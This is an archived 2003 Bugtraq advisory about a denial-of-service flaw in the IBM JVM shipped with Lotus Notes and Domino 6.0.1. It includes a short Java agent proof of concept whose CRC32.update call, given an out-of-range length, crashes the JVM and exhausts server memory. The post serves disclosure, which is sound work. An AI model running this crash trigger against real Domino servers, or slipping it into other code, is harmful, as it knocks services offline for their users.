97953 2003-04-07 18:31 /69 rader/ Marc Schoenefeld <schonef@uni-muenster.de>
Importerad: 2003-04-07 18:31 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4391>
Ärende: Java Agent freezes Lotus Notes and Domino 6.0.1
------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
the following agent causes the IBM JVM 1.3.1 shipped with Lotus
Domino 6.0.1 and Lotus Notes 6.0.1 to crash. After calling the agent
a huge amount of memory is not freed and causes the server machine
(observed on MS XP) to deny further service.
IMPLICATIONS
- - If the agent is run on the client, Lotus Notes 6.0.1 is
vulnerable,
- - if the agent is run on the server, Lotus Domino 6.0.1 is
vulnerable.
ANALYSIS: The call to the "update" method of the CRC32 raises an
integer overflow in the java java.util.zip.* core libraries which
triggers a jni routine that cannot handle the extreme high input
value.
HISTORY:
This vulnerability has already been detected in the Sun JDK
(http://developer.java.sun.com/developer/bugParade/bugs/4811913.html),
and was disclosed at Blackhat Windows 2003.
The background of this bugs is described at www.illegalaccess.org
Sincerely
Marc Schoenefeld
=========================Agent Source Code===========================
import lotus.domino.*;
import java.util.zip.*;
public class JavaAgent extends AgentBase {
public void NotesMain() {
try {
Session session = getSession();
AgentContext agentContext =
session.getAgentContext();
CRC32 crc32 = new CRC32();
crc32.update(new byte[0], 4, 0x7ffffffc);
// (Your code goes here)
} catch(Exception e) {
e.printStackTrace();
}
}
}
=========================Agent Source Code===========================
- --
Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous
Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org
iD8DBQE+j09FqCaQvrKNUNQRAs9uAJ4unAFEKqqRuk4gBlkNSKQ5rTMa0wCfVzC+
iJHcqblX8QE7UaPofUrKU3Y=
=l93r
-----END PGP SIGNATURE-----
(97953) /Marc Schoenefeld <schonef@uni-muenster.de>/(Ombruten)